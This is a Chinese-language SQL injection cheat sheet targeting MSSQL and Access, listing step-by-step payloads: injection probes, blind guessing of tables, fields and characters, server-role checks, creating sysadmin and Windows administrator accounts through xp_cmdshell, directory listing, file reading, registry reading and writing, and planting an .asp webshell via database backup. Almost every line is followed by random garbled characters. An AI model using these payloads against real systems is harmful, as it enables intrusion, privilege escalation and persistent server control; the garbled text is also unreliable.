1.判断是否有注入;and 1=1 ;and 1=2 *oe�X�m��Y
2.初步判断是否是mssql ;and user>0 ^N�[ Cip}8
!tt 8-Y)i�
3.注入参数是字符'and [查询条件] and ''=' Ws7���fWK;
�H� la�?\�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' u
z7|!G!43
�C��0�K�FN
5.判断数据库系统 L�ui�6;�NY
�1Ml���<�>
;and (select count(*) from sysobjects)>0 mssql +u�Sp3gE"�
CQNMCYjg(R
;and (select count(*) from msysobjects)>0 access iLIb-d?!a&
vPGU�E`!D+
_@y uaMoW=
j~1K(=N�g
6.猜数据库 ;and (select Count(*) from [数据库名])>0 !yPy@eP�~�
?P��-��O�4
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 e"�wz�b< b
<" nWG�F4d
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �5I,NvHD�4
U�3z23L�gA
9.(1)猜字段的ascii值(access) A$N%d���eb
l"�A/6r!Dp
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 >\^oCbqF}~
Pj]^���p{>
(2)猜字段的ascii值(mssql) ZzN�H��EV
�M9A1
8d|�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 .B-��b51Uz
Q�-�V�8=�.
10.测试权限结构(mssql) _�AF��je
x?V^���l�*
�t��6�\H��
Pg�8bo�N]}
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- k�m���C0.\
;l�_b.z0^6
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 6WQN�!H8+^
�z[1uub,)1
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �?g�{[U�0)
T)sIV�5b�k
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �yN���XYS�
y>x"/jz�F#
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �iAQ[;M�3p
&gruYZ�GK�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- p\�6}�<b"p
�b9vud���r
;and 1=(select IS_MEMBER('db_owner'));-- C�5�-u86F
:0Jn`Ds4�o
gk�6���R#
)�W� 5g-@�
11.添加mssql和系统的帐户 �t`�E5bW�G
��]o]`X�$n
;exec master.dbo.sp_addlogin username;-- X�WA�IW=�.
;exec master.dbo.sp_password null,username,password;-- Ewp2 ����1
p�?>J86%[
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- z^`4n_(Ygu
.�z_nW1i�d
;exec master.dbo.xp_cmdshell 'net user username password &�Pm@+ML*x
M �j[+�h|e
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- PdVx&BL�*
?i0+h7��=6
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �:t�!J
9��
PvV�\b<Pe+
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- r�g��CC3TX
/klo)��,|&
zO\_�^A|8H
Bj2iYk_cLa
12.(1)遍历目录 eA��2*}"W�
0J'�C�x&Rg
;create table dirs(paths varchar(100), id int) �X��e\}(O�
W|@SXO)D�Y
;insert dirs exec master.dbo.xp_dirtree 'c:\' 72xf�|��s=
�5I6�?�gv/
;and (select top 1 paths from dirs)>0 S�+[,�\>pY
FT~�c|e�p.
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) {$[0YRNk
u
.w�d7^wI^S
Bf00&�P�E;
���2�=�;ZJ
(2)遍历目录 �u`�N�rg<
";(m,i��f-
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ��qXq#A�&
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �@HMH>;haE
flqr["czwK
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 5OGwOZAj52
hs�;|,�r��
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 !�gRU;ZQU_
0� fT*��O�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �y~#5!:Be�
rwUhNth-Qh
^0>^�5l'�n
,e�1��c,�}
13.mssql中的存储过程 �uGXvP(Pg'
~I>���|f��
xp_regenumvalues 注册表根键, 子键 �W`�_Wi*z4
3�=ME$%f��
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 6zU0� 8z0-
r�t�vLLOIO
xp_regread 根键,子键,键值名 �~l'[P=R+8
�E�t*Lb�U
;exec xp_regread �:/=��P6b;
4�I�fk�YM
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 `_Iyr�3HAf
9m>L\&\_�e
xp_regwrite 根键,子键, 值名, 值类型, 值 Th%w-19,8�
KS~�Q[-F1P
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 &f���'�Lll
`O3#�/1��+
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 Om:��Gun\%
�t"%~r3�{�
xp_regdeletevalue 根键,子键,值名 �:�jTbzDqQ
2ALYf��Z|d
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 d:��&cq8^�
��R6�;229e
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ��w�\d1���
6I=d0m.i�o
gPK�O-Fsd"
|Zn,|-�i�W
14.mssql的backup创建webshell %iIr %P?
Iu~(SKr=|$
use model � nS�o.,72
2i6P�<&�@
create table cmd(str image); ^�v�;8 (eF
�]nI�VP���
insert into cmd(str) values (''); �f�~�=��e�
}o�
G�MF~�
backup database model to disk='c:\l.asp'; s�u\�Lxv�
Aj\m57e�,6
�>/GYw"KK�
mrE>���o�!
15.mssql内置函数 uKIR�$�n�"
C\C*@9=&�x
;and (select @@version)>0 获得Windows的版本号 0"�"%@X]�m
0�\ j�)!b�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa cru&nH*O^�
GF<�SQHL�,
;and (select user_name())>0 爆当前系统的连接用户 ��dXt@x�8E
yyVJb3n5:!
;and (select db_name())>0 得到当前连接的数据库 {2g�?+8L$Z
P�L�\4\dXB
!C�' �Y�
7
+)�(
"�!@�
16.简洁的webshell K nn<q=';G
U�G}"OBg/�
use model b7�M����)�
"w�V7PSb�M
create table cmd(str image); :oZ�~&�H5Q
0#�ePg6�n
insert into cmd(str) values ('');
�_�3KfY��
I�U}g[O�Cu
backup database model to disk='g:\wwwtest\l.asp';
